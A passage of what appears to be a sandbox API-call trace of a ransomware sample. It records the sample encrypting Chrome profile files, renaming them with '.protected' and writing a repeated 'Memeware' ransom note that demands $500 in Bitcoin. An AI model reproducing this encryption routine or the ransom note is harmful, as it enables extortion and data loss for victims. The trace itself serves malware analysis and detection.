(lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Local State") returned 83 [0084.451] StrStrW (lpFirst="Local State", lpSrch=".txt") returned 0x0 [0084.451] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Local State") returned 83 [0084.451] StrStrW (lpFirst="Local State", lpSrch=".rar") returned 0x0 [0084.451] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Local State") returned 83 [0084.451] StrStrW (lpFirst="Local State", lpSrch=".zip") returned 0x0 [0084.451] ReadFile (in: hFile=0x150, lpBuffer=0x4a1458, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x295e7b4, lpOverlapped=0x0 | out: lpBuffer=0x4a1458*, lpNumberOfBytesRead=0x295e7b4*=0x2800, lpOverlapped=0x0) returned 1 [0084.471] SetFilePointerEx (in: hFile=0x150, liDistanceToMove=0xffffd800, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0084.471] WriteFile (in: hFile=0x150, lpBuffer=0x4a1458*, nNumberOfBytesToWrite=0x2800, lpNumberOfBytesWritten=0x295e7b4, lpOverlapped=0x0 | out: lpBuffer=0x4a1458*, lpNumberOfBytesWritten=0x295e7b4*=0x2800, lpOverlapped=0x0) returned 1 [0084.471] SetFilePointerEx (in: hFile=0x150, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0084.471] WriteFile (in: hFile=0x150, lpBuffer=0x295e78c*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x295e7b4, lpOverlapped=0x0 | out: lpBuffer=0x295e78c*, lpNumberOfBytesWritten=0x295e7b4*=0x4, lpOverlapped=0x0) returned 1 [0084.472] WriteFile (in: hFile=0x150, lpBuffer=0x48ea38*, nNumberOfBytesToWrite=0x30, lpNumberOfBytesWritten=0x295e7b4, lpOverlapped=0x0 | out: lpBuffer=0x48ea38*, lpNumberOfBytesWritten=0x295e7b4*=0x30, lpOverlapped=0x0) returned 1 [0084.472] CloseHandle (hObject=0x150) returned 1 [0084.472] wnsprintfW (in: pszDest=0x514c90, cchDest=32767, pszFmt="%s%s" | out: 
pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Local State.protected") returned 93 [0084.472] MoveFileW (lpExistingFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Local State" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\local state"), lpNewFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Local State.protected" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\local state.protected")) returned 1 [0084.473] FindNextFileW (in: hFindFile=0x47ba90, lpFindFileData=0x295e7d0 | out: lpFindFileData=0x295e7d0) returned 1 [0084.473] lstrcmpiW (lpString1="OriginTrials", lpString2="Windows") returned -1 [0084.473] lstrcmpiW (lpString1="OriginTrials", lpString2="Program Files") returned -1 [0084.473] lstrcmpiW (lpString1="OriginTrials", lpString2="Program Files (x86)") returned -1 [0084.473] lstrcmpiW (lpString1="OriginTrials", lpString2="$Recycle.bin") returned 1 [0084.473] lstrcmpiW (lpString1="OriginTrials", lpString2="System Volume Information") returned -1 [0084.473] wnsprintfW (in: pszDest=0x504c48, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\OriginTrials") returned 84 [0084.473] lstrcmpW (lpString1="OriginTrials", lpString2=".") returned 1 [0084.473] lstrcmpW (lpString1="OriginTrials", lpString2="..") returned 1 [0084.473] wnsprintfW (in: pszDest=0x514c90, cchDest=32767, pszFmt="%s\\*" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\OriginTrials\\*") returned 86 [0084.473] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\OriginTrials\\*", lpFindFileData=0x295e560 | out: lpFindFileData=0x295e560) returned 0x47bad0 [0084.473] lstrcmpiW (lpString1=".", 
lpString2="Windows") returned -1 [0084.473] lstrcmpiW (lpString1=".", lpString2="Program Files") returned -1 [0084.473] lstrcmpiW (lpString1=".", lpString2="Program Files (x86)") returned -1 [0084.473] lstrcmpiW (lpString1=".", lpString2="$Recycle.bin") returned 1 [0084.473] lstrcmpiW (lpString1=".", lpString2="System Volume Information") returned -1 [0084.473] wnsprintfW (in: pszDest=0x514c90, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\OriginTrials\\.") returned 86 [0084.473] lstrcmpW (lpString1=".", lpString2=".") returned 0 [0084.473] FindNextFileW (in: hFindFile=0x47bad0, lpFindFileData=0x295e560 | out: lpFindFileData=0x295e560) returned 1 [0084.473] lstrcmpiW (lpString1="..", lpString2="Windows") returned -1 [0084.473] lstrcmpiW (lpString1="..", lpString2="Program Files") returned -1 [0084.473] lstrcmpiW (lpString1="..", lpString2="Program Files (x86)") returned -1 [0084.473] lstrcmpiW (lpString1="..", lpString2="$Recycle.bin") returned 1 [0084.473] lstrcmpiW (lpString1="..", lpString2="System Volume Information") returned -1 [0084.474] wnsprintfW (in: pszDest=0x514c90, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\OriginTrials\\..") returned 87 [0084.474] lstrcmpW (lpString1="..", lpString2=".") returned 1 [0084.474] lstrcmpW (lpString1="..", lpString2="..") returned 0 [0084.474] FindNextFileW (in: hFindFile=0x47bad0, lpFindFileData=0x295e560 | out: lpFindFileData=0x295e560) returned 0 [0084.474] FindClose (in: hFindFile=0x47bad0 | out: hFindFile=0x47bad0) returned 1 [0084.474] wnsprintfW (in: pszDest=0x514c90, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\OriginTrials\\RESTORE_FILES.txt") returned 102 [0084.474] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS 
HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\OriginTrials\\RESTORE_FILES.txt" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\origintrials\\restore_files.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x150 [0084.474] lstrlenA (lpString="! SYSTEM SECURITY ALERT !\r\n-----------------------------------------------------------------------------\r\nYour SERVER was tried to be attacked by an outsider.\r\nImmediatly change your password, use a minimum of 8 characters in length.\r\n-----------------------------------------------------------------------------\r\n\r\nAll your personal files was encrypted with RSA public key (1024 bit) to SAVE them from a third party persons. \r\nNow they are ENCRYPTED and SAFE!\r\n\r\nTo RESTORE all your files back immediatly, follow this few simple steps:\r\n\r\n1) Our SECURE-SERVER service charge a payment for file decryption and preventing damage of your SERVER by 3th party persons;\r\n2) After your SUCCESSFUL payment, write us an E-MAIL with your unique SERVER-ID and payment ID;\r\n3) Receive an DECRYPTION TOOL from us back to your E-MAIL;\r\n4) Run the tool on your SERVER and safe-decrypt all your files back to NORMAL state.\r\n\r\nWe STRONGLY RECOMMEND you NOT to use any other decryption tool, files will be LOST!\r\n\r\nWe guarantee:\r\n\r\n100% Successful restoring all of your files\r\n100% Satisfaction guarantee\r\n100% Safe and secure service\r\n\r\n------------------------------------------------------------------------------\r\n\r\nOur E-MAIL: secureserver@memeware.net\r\nPayment type: Bitcoin\r\nSum: $500\r\nOur wallet: 1CfMU2eKnajfpnYvLbWR3m7jZRXujtx8Cm\r\nYour SERVER-ID:\r\n") returned 1341 [0084.474] WriteFile (in: hFile=0x150, lpBuffer=0xf01390*, nNumberOfBytesToWrite=0x53d, lpNumberOfBytesWritten=0x295e544, lpOverlapped=0x0 | out: lpBuffer=0xf01390*, 
lpNumberOfBytesWritten=0x295e544*=0x53d, lpOverlapped=0x0) returned 1 [0084.475] lstrlenA (lpString="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") returned 684 [0084.475] WriteFile (in: hFile=0x150, lpBuffer=0x447448*, nNumberOfBytesToWrite=0x2ac, lpNumberOfBytesWritten=0x295e544, lpOverlapped=0x0 | out: lpBuffer=0x447448*, lpNumberOfBytesWritten=0x295e544*=0x2ac, lpOverlapped=0x0) returned 1 [0084.475] lstrlenA (lpString="\r\n------------------------------------------------------------------------------\r\nFor any questions, write us: secureserver@memeware.net\r\nMEMEWARE SECURE-SERVER SYSTEMS (c) 2018") returned 177 [0084.475] WriteFile (in: hFile=0x150, lpBuffer=0xf018d0*, nNumberOfBytesToWrite=0xb1, lpNumberOfBytesWritten=0x295e544, lpOverlapped=0x0 | out: lpBuffer=0xf018d0*, lpNumberOfBytesWritten=0x295e544*=0xb1, lpOverlapped=0x0) returned 1 [0084.476] CloseHandle (hObject=0x150) returned 1 [0084.476] FindNextFileW (in: hFindFile=0x47ba90, lpFindFileData=0x295e7d0 | out: lpFindFileData=0x295e7d0) returned 1 [0084.476] lstrcmpiW (lpString1="PepperFlash", lpString2="Windows") returned -1 [0084.476] lstrcmpiW (lpString1="PepperFlash", lpString2="Program Files") returned -1 [0084.476] lstrcmpiW (lpString1="PepperFlash", lpString2="Program Files (x86)") returned -1 [0084.476] lstrcmpiW (lpString1="PepperFlash", lpString2="$Recycle.bin") returned 1 [0084.476] lstrcmpiW (lpString1="PepperFlash", lpString2="System Volume Information") returned -1 [0084.476] wnsprintfW (in: pszDest=0x504c48, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\PepperFlash") returned 83 [0084.476] lstrcmpW (lpString1="PepperFlash", lpString2=".") returned 1 [0084.476] lstrcmpW (lpString1="PepperFlash", lpString2="..") returned 1 [0084.476] wnsprintfW (in: pszDest=0x514c90, cchDest=32767, pszFmt="%s\\*" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User 
Data\\PepperFlash\\*") returned 85 [0084.476] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\PepperFlash\\*", lpFindFileData=0x295e560 | out: lpFindFileData=0x295e560) returned 0x47bad0 [0084.476] lstrcmpiW (lpString1=".", lpString2="Windows") returned -1 [0084.476] lstrcmpiW (lpString1=".", lpString2="Program Files") returned -1 [0084.476] lstrcmpiW (lpString1=".", lpString2="Program Files (x86)") returned -1 [0084.477] lstrcmpiW (lpString1=".", lpString2="$Recycle.bin") returned 1 [0084.477] lstrcmpiW (lpString1=".", lpString2="System Volume Information") returned -1 [0084.477] wnsprintfW (in: pszDest=0x514c90, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\PepperFlash\\.") returned 85 [0084.477] lstrcmpW (lpString1=".", lpString2=".") returned 0 [0084.477] FindNextFileW (in: hFindFile=0x47bad0, lpFindFileData=0x295e560 | out: lpFindFileData=0x295e560) returned 1 [0084.477] lstrcmpiW (lpString1="..", lpString2="Windows") returned -1 [0084.477] lstrcmpiW (lpString1="..", lpString2="Program Files") returned -1 [0084.477] lstrcmpiW (lpString1="..", lpString2="Program Files (x86)") returned -1 [0084.477] lstrcmpiW (lpString1="..", lpString2="$Recycle.bin") returned 1 [0084.477] lstrcmpiW (lpString1="..", lpString2="System Volume Information") returned -1 [0084.477] wnsprintfW (in: pszDest=0x514c90, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\PepperFlash\\..") returned 86 [0084.477] lstrcmpW (lpString1="..", lpString2=".") returned 1 [0084.477] lstrcmpW (lpString1="..", lpString2="..") returned 0 [0084.477] FindNextFileW (in: hFindFile=0x47bad0, lpFindFileData=0x295e560 | out: lpFindFileData=0x295e560) returned 0 [0084.477] FindClose (in: hFindFile=0x47bad0 | out: hFindFile=0x47bad0) returned 1 [0084.477] wnsprintfW (in: 
pszDest=0x514c90, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\PepperFlash\\RESTORE_FILES.txt") returned 101 [0084.477] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\PepperFlash\\RESTORE_FILES.txt" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\pepperflash\\restore_files.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x150 [0084.477] lstrlenA (lpString="! SYSTEM SECURITY ALERT !\r\n-----------------------------------------------------------------------------\r\nYour SERVER was tried to be attacked by an outsider.\r\nImmediatly change your password, use a minimum of 8 characters in length.\r\n-----------------------------------------------------------------------------\r\n\r\nAll your personal files was encrypted with RSA public key (1024 bit) to SAVE them from a third party persons. 
\r\nNow they are ENCRYPTED and SAFE!\r\n\r\nTo RESTORE all your files back immediatly, follow this few simple steps:\r\n\r\n1) Our SECURE-SERVER service charge a payment for file decryption and preventing damage of your SERVER by 3th party persons;\r\n2) After your SUCCESSFUL payment, write us an E-MAIL with your unique SERVER-ID and payment ID;\r\n3) Receive an DECRYPTION TOOL from us back to your E-MAIL;\r\n4) Run the tool on your SERVER and safe-decrypt all your files back to NORMAL state.\r\n\r\nWe STRONGLY RECOMMEND you NOT to use any other decryption tool, files will be LOST!\r\n\r\nWe guarantee:\r\n\r\n100% Successful restoring all of your files\r\n100% Satisfaction guarantee\r\n100% Safe and secure service\r\n\r\n------------------------------------------------------------------------------\r\n\r\nOur E-MAIL: secureserver@memeware.net\r\nPayment type: Bitcoin\r\nSum: $500\r\nOur wallet: 1CfMU2eKnajfpnYvLbWR3m7jZRXujtx8Cm\r\nYour SERVER-ID:\r\n") returned 1341 [0084.477] WriteFile (in: hFile=0x150, lpBuffer=0xf01390*, nNumberOfBytesToWrite=0x53d, lpNumberOfBytesWritten=0x295e544, lpOverlapped=0x0 | out: lpBuffer=0xf01390*, lpNumberOfBytesWritten=0x295e544*=0x53d, lpOverlapped=0x0) returned 1 [0084.479] lstrlenA (lpString="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") returned 684 [0084.479] WriteFile (in: hFile=0x150, lpBuffer=0x447448*, nNumberOfBytesToWrite=0x2ac, lpNumberOfBytesWritten=0x295e544, lpOverlapped=0x0 | out: lpBuffer=0x447448*, lpNumberOfBytesWritten=0x295e544*=0x2ac, lpOverlapped=0x0) returned 1 [0084.480] lstrlenA (lpString="\r\n------------------------------------------------------------------------------\r\nFor any questions, write us: secureserver@memeware.net\r\nMEMEWARE SECURE-SERVER SYSTEMS (c) 2018") returned 177 [0084.480] WriteFile (in: hFile=0x150, lpBuffer=0xf018d0*, nNumberOfBytesToWrite=0xb1, lpNumberOfBytesWritten=0x295e544, lpOverlapped=0x0 | out: lpBuffer=0xf018d0*, lpNumberOfBytesWritten=0x295e544*=0xb1, 
lpOverlapped=0x0) returned 1 [0084.480] CloseHandle (hObject=0x150) returned 1 [0084.480] FindNextFileW (in: hFindFile=0x47ba90, lpFindFileData=0x295e7d0 | out: lpFindFileData=0x295e7d0) returned 1 [0084.480] lstrcmpiW (lpString1="pnacl", lpString2="Windows") returned -1 [0084.480] lstrcmpiW (lpString1="pnacl", lpString2="Program Files") returned -1 [0084.480] lstrcmpiW (lpString1="pnacl", lpString2="Program Files (x86)") returned -1 [0084.480] lstrcmpiW (lpString1="pnacl", lpString2="$Recycle.bin") returned 1 [0084.480] lstrcmpiW (lpString1="pnacl", lpString2="System Volume Information") returned -1 [0084.480] wnsprintfW (in: pszDest=0x504c48, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\pnacl") returned 77 [0084.480] lstrcmpW (lpString1="pnacl", lpString2=".") returned 1 [0084.480] lstrcmpW (lpString1="pnacl", lpString2="..") returned 1 [0084.480] wnsprintfW (in: pszDest=0x514c90, cchDest=32767, pszFmt="%s\\*" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\pnacl\\*") returned 79 [0084.480] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\pnacl\\*", lpFindFileData=0x295e560 | out: lpFindFileData=0x295e560) returned 0x47bad0 [0084.480] lstrcmpiW (lpString1=".", lpString2="Windows") returned -1 [0084.480] lstrcmpiW (lpString1=".", lpString2="Program Files") returned -1 [0084.480] lstrcmpiW (lpString1=".", lpString2="Program Files (x86)") returned -1 [0084.480] lstrcmpiW (lpString1=".", lpString2="$Recycle.bin") returned 1 [0084.480] lstrcmpiW (lpString1=".", lpString2="System Volume Information") returned -1 [0084.480] wnsprintfW (in: pszDest=0x514c90, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\pnacl\\.") returned 79 [0084.480] lstrcmpW (lpString1=".", lpString2=".") returned 0 
[0084.480] FindNextFileW (in: hFindFile=0x47bad0, lpFindFileData=0x295e560 | out: lpFindFileData=0x295e560) returned 1 [0084.481] lstrcmpiW (lpString1="..", lpString2="Windows") returned -1 [0084.481] lstrcmpiW (lpString1="..", lpString2="Program Files") returned -1 [0084.481] lstrcmpiW (lpString1="..", lpString2="Program Files (x86)") returned -1 [0084.481] lstrcmpiW (lpString1="..", lpString2="$Recycle.bin") returned 1 [0084.481] lstrcmpiW (lpString1="..", lpString2="System Volume Information") returned -1 [0084.481] wnsprintfW (in: pszDest=0x514c90, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\pnacl\\..") returned 80 [0084.481] lstrcmpW (lpString1="..", lpString2=".") returned 1 [0084.481] lstrcmpW (lpString1="..", lpString2="..") returned 0 [0084.481] FindNextFileW (in: hFindFile=0x47bad0, lpFindFileData=0x295e560 | out: lpFindFileData=0x295e560) returned 0 [0084.481] FindClose (in: hFindFile=0x47bad0 | out: hFindFile=0x47bad0) returned 1 [0084.481] wnsprintfW (in: pszDest=0x514c90, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\pnacl\\RESTORE_FILES.txt") returned 95 [0084.481] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\pnacl\\RESTORE_FILES.txt" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\pnacl\\restore_files.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x150 [0084.481] lstrlenA (lpString="! 
SYSTEM SECURITY ALERT !\r\n-----------------------------------------------------------------------------\r\nYour SERVER was tried to be attacked by an outsider.\r\nImmediatly change your password, use a minimum of 8 characters in length.\r\n-----------------------------------------------------------------------------\r\n\r\nAll your personal files was encrypted with RSA public key (1024 bit) to SAVE them from a third party persons. \r\nNow they are ENCRYPTED and SAFE!\r\n\r\nTo RESTORE all your files back immediatly, follow this few simple steps:\r\n\r\n1) Our SECURE-SERVER service charge a payment for file decryption and preventing damage of your SERVER by 3th party persons;\r\n2) After your SUCCESSFUL payment, write us an E-MAIL with your unique SERVER-ID and payment ID;\r\n3) Receive an DECRYPTION TOOL from us back to your E-MAIL;\r\n4) Run the tool on your SERVER and safe-decrypt all your files back to NORMAL state.\r\n\r\nWe STRONGLY RECOMMEND you NOT to use any other decryption tool, files will be LOST!\r\n\r\nWe guarantee:\r\n\r\n100% Successful restoring all of your files\r\n100% Satisfaction guarantee\r\n100% Safe and secure service\r\n\r\n------------------------------------------------------------------------------\r\n\r\nOur E-MAIL: secureserver@memeware.net\r\nPayment type: Bitcoin\r\nSum: $500\r\nOur wallet: 1CfMU2eKnajfpnYvLbWR3m7jZRXujtx8Cm\r\nYour SERVER-ID:\r\n") returned 1341 [0084.481] WriteFile (in: hFile=0x150, lpBuffer=0xf01390*, nNumberOfBytesToWrite=0x53d, lpNumberOfBytesWritten=0x295e544, lpOverlapped=0x0 | out: lpBuffer=0xf01390*, lpNumberOfBytesWritten=0x295e544*=0x53d, lpOverlapped=0x0) returned 1 [0084.482] lstrlenA (lpString="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") returned 684 [0084.482] WriteFile (in: hFile=0x150, lpBuffer=0x447448*, nNumberOfBytesToWrite=0x2ac, lpNumberOfBytesWritten=0x295e544, lpOverlapped=0x0 | out: lpBuffer=0x447448*, lpNumberOfBytesWritten=0x295e544*=0x2ac, lpOverlapped=0x0) returned 1 
[0084.482] lstrlenA (lpString="\r\n------------------------------------------------------------------------------\r\nFor any questions, write us: secureserver@memeware.net\r\nMEMEWARE SECURE-SERVER SYSTEMS (c) 2018") returned 177 [0084.482] WriteFile (in: hFile=0x150, lpBuffer=0xf018d0*, nNumberOfBytesToWrite=0xb1, lpNumberOfBytesWritten=0x295e544, lpOverlapped=0x0 | out: lpBuffer=0xf018d0*, lpNumberOfBytesWritten=0x295e544*=0xb1, lpOverlapped=0x0) returned 1 [0084.483] CloseHandle (hObject=0x150) returned 1 [0084.483] FindNextFileW (in: hFindFile=0x47ba90, lpFindFileData=0x295e7d0 | out: lpFindFileData=0x295e7d0) returned 1 [0084.483] lstrcmpiW (lpString1="Safe Browsing Channel IDs", lpString2="Windows") returned -1 [0084.483] lstrcmpiW (lpString1="Safe Browsing Channel IDs", lpString2="Program Files") returned 1 [0084.483] lstrcmpiW (lpString1="Safe Browsing Channel IDs", lpString2="Program Files (x86)") returned 1 [0084.483] lstrcmpiW (lpString1="Safe Browsing Channel IDs", lpString2="$Recycle.bin") returned 1 [0084.483] lstrcmpiW (lpString1="Safe Browsing Channel IDs", lpString2="System Volume Information") returned -1 [0084.483] wnsprintfW (in: pszDest=0x504c48, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Safe Browsing Channel IDs") returned 97 [0084.483] StrStrIW (lpFirst="Safe Browsing Channel IDs", lpSrch=".protected") returned 0x0 [0084.483] lstrcmpW (lpString1="Safe Browsing Channel IDs", lpString2="RESTORE_FILES.txt") returned 1 [0084.483] CryptGenRandom (in: hProv=0x444d38, dwLen=0x20, pbBuffer=0x295e76c | out: pbBuffer=0x295e76c) returned 1 [0084.483] CryptEncrypt (in: hKey=0x444cf8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x48ea38*, pdwDataLen=0x295e794*=0x20, dwBufLen=0x30 | out: pbData=0x48ea38*, pdwDataLen=0x295e794*=0x30) returned 1 [0084.483] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Safe Browsing 
Channel IDs" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\safe browsing channel ids"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x150 [0084.483] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Safe Browsing Channel IDs") returned 97 [0084.484] StrStrW (lpFirst="Safe Browsing Channel IDs", lpSrch=".txt") returned 0x0 [0084.484] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Safe Browsing Channel IDs") returned 97 [0084.484] StrStrW (lpFirst="Safe Browsing Channel IDs", lpSrch=".rar") returned 0x0 [0084.484] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Safe Browsing Channel IDs") returned 97 [0084.484] StrStrW (lpFirst="Safe Browsing Channel IDs", lpSrch=".zip") returned 0x0 [0084.484] ReadFile (in: hFile=0x150, lpBuffer=0x4a1458, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x295e7b4, lpOverlapped=0x0 | out: lpBuffer=0x4a1458*, lpNumberOfBytesRead=0x295e7b4*=0x1400, lpOverlapped=0x0) returned 1 [0084.493] SetFilePointerEx (in: hFile=0x150, liDistanceToMove=0xffffec00, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0084.493] WriteFile (in: hFile=0x150, lpBuffer=0x4a1458*, nNumberOfBytesToWrite=0x1400, lpNumberOfBytesWritten=0x295e7b4, lpOverlapped=0x0 | out: lpBuffer=0x4a1458*, lpNumberOfBytesWritten=0x295e7b4*=0x1400, lpOverlapped=0x0) returned 1 [0084.493] SetFilePointerEx (in: hFile=0x150, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0084.493] WriteFile (in: hFile=0x150, lpBuffer=0x295e78c*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x295e7b4, lpOverlapped=0x0 | out: lpBuffer=0x295e78c*, lpNumberOfBytesWritten=0x295e7b4*=0x4, 
lpOverlapped=0x0) returned 1 [0084.493] WriteFile (in: hFile=0x150, lpBuffer=0x48ea38*, nNumberOfBytesToWrite=0x30, lpNumberOfBytesWritten=0x295e7b4, lpOverlapped=0x0 | out: lpBuffer=0x48ea38*, lpNumberOfBytesWritten=0x295e7b4*=0x30, lpOverlapped=0x0) returned 1 [0084.493] CloseHandle (hObject=0x150) returned 1 [0084.493] wnsprintfW (in: pszDest=0x514c90, cchDest=32767, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Safe Browsing Channel IDs.protected") returned 107 [0084.493] MoveFileW (lpExistingFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Safe Browsing Channel IDs" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\safe browsing channel ids"), lpNewFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Safe Browsing Channel IDs.protected" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\safe browsing channel ids.protected")) returned 1 [0084.494] FindNextFileW (in: hFindFile=0x47ba90, lpFindFileData=0x295e7d0 | out: lpFindFileData=0x295e7d0) returned 1 [0084.494] lstrcmpiW (lpString1="Safe Browsing Channel IDs-journal", lpString2="Windows") returned -1 [0084.494] lstrcmpiW (lpString1="Safe Browsing Channel IDs-journal", lpString2="Program Files") returned 1 [0084.494] lstrcmpiW (lpString1="Safe Browsing Channel IDs-journal", lpString2="Program Files (x86)") returned 1 [0084.494] lstrcmpiW (lpString1="Safe Browsing Channel IDs-journal", lpString2="$Recycle.bin") returned 1 [0084.494] lstrcmpiW (lpString1="Safe Browsing Channel IDs-journal", lpString2="System Volume Information") returned -1 [0084.494] wnsprintfW (in: pszDest=0x504c48, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Safe Browsing Channel IDs-journal") returned 105 [0084.494] StrStrIW 
